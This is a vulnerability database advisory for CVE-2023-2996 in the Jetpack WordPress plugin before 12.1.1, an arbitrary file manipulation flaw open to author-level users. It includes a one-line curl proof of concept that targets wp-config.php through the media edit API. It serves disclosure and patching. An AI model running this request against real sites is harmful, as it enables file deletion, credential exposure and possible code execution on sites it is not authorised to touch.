Jetpack < 12.1.1 – Author+ Arbitrary File Manipulation via API | CVE 2023-2996 | Plugin Vulnerabilities

Description

The plugin does not validate uploaded files, allowing users with author roles or above to manipulate existing files on the site, deleting arbitrary files, and in rare cases achieve Remote Code Execution via phar deserialization.

Proof of Concept

curl --json '{ "media": {"tmp_name": "/WP_CONTENT_PATH/wp-config.php", "name": "test.txt"} }' https://public-api.wordpress.com/rest/v1.2/sites/BLOG_ID/media/1/edit

Where BLOG_ID is the site Jetpack blog id.

Affects Plugins

Fixed in 12.1.1

References

CVE

URL

https://jetpack.com/blog/jetpack-12-1-1-critical-security-update/

Miscellaneous

Original Researcher

Miguel Neto

Submitter

WPScan

Submitter website

https://wpscan.com

Verified

Yes

WPVDB ID

52d221bd-ae42-435d-a90a-60a5ae530663

Timeline

Publicly Published

2023-05-30 (about 11 months ago)

Added

2023-05-30 (about 11 months ago)

Last Updated

2023-05-30 (about 11 months ago)

Other

Published

Title

Published

2016-05-06

Title

Yoast SEO <= 3.2.4 - Subscriber Settings Sensitive Data Exposure

Published

2019-01-25

Title

Total Donations - Update Arbitrary WordPress Option Values

Published

2023-03-06

Title

Formidable Forms < 6.1 - IP Spoofing

Published

2023-07-27

Title

Change WP Admin < 1.1.4 - Secret Login Page Disclosure

Published

2010-12-15

Title

Cforms & CformsII <= 14.10.1 - CAPTCHA Bypass